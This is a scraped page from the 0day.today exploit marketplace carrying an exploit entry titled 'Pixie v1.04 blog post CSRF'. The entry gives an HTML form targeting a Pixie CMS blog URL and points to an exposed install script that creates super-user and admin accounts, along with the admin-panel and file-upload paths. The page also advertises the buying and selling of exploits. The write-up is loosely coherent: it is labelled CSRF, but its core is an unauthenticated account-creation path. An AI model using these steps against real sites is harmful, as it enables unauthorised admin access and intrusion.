[ 首页 ]  [ 私有 ]  [ 0Day ]  [ discount ]  [ 获取金币 ]  [ 平台 ]  [ 渗透测试 ]  [ 搜索 ]  [ 常见问题 ]  [ 联系我们 ]  [ 页面风格 ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB 官方脸书
0day.today Exploit DB 官方推特
0day.today Exploit DB 官方 RSS 频道
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - 世界最大的漏洞利用数据库。
选择语言:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
0day.today 用户须知:
  • 我们唯一的域名:http://0day.today
  • 我们大多数的材料都完全免费
  • 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
    你需要购买或者赢取金币 金币
We accept currencies: [contact admin to find more]
           
我们不希望本站被用于黑客用途。一经查实用户有任何形式的非法访问行为,此用户的账户和数据会被从本站删除。

本站管理员使用官方账号。请谨防诈骗!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
我已经是 0day.today 注册用户。 不要再显示此信息。
进站须知
  1. 请读 [ 协议 ]
  2. 请读 [ 提交 ] 规则
  3. 请访问 [ 常见问题 ] 页
  4. [ 注册 ] 用户信息
  5. 获取 [ 金币 ]
  6. 如果你想要 [ 出售 ]
  7. 如果你想要 [ 购买 ]
  8. 如果你丢失了 [ 账户 ]
  9. 如有任何问题 [ [email protected] ]


主链接


你可以由此方式联系我们

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ 授权 ] [ 注册 ] [ 恢复账号 ]
联系我们
你可以由此方式联系我们:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today 漏洞利用市场和0day漏洞利用数据库

Pixie v1.04 blog post CSRF

作者
hackme
风险
[
安全风险级别 - 未分类
]
0day-ID
0day-ID-17272
类别
web applications
添加日期
11-12-2011
平台
php
# Exploit Title: Pixie v1.04 blog post CSRF
# Google Dork: # Date: 11-Dec-2011
# Author: hackme
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
# Version: 1.04# Tested on: Linux Ubuntu 10.10
# CVE :
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
[+] Post Method
[+] exploit:
 
<form method="POST" action="http://127.0.0.1/pixie/?s=blog&m=permalink&x=my-first-post">
name: <input type="Text" name="name" id="name" size="15"/><br>
e-mail: <input type="Text" name="email" id="email" size="15"/>
<br>web(optional): <input type="Text" name="web" id="web" size="15"/><br>
comment: <input type="Text" name="comment" id="comment" size="15"/><br>
<input type="Submit" name="comment_submit" id="comment_submit" value="invia" size="15"/>
<input type="Hidden" name="post" id="post" value="1"/></form>

EXPLOIT :

http://site.com/admin/install/createuser.php

+ You can Creat :

- Super user
- Admin
- Client
- User

~ Admin Panel : http://site.com/admin/
~ Upload file : http://site.com/admin/?s=publish&x=filemanager 




#  0day.today [2024-07-02]  #
漏洞数据库购买和出售各类漏洞利用(例如本地,远程,拒绝服务,概念验证代码,等等)
请提交至: mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team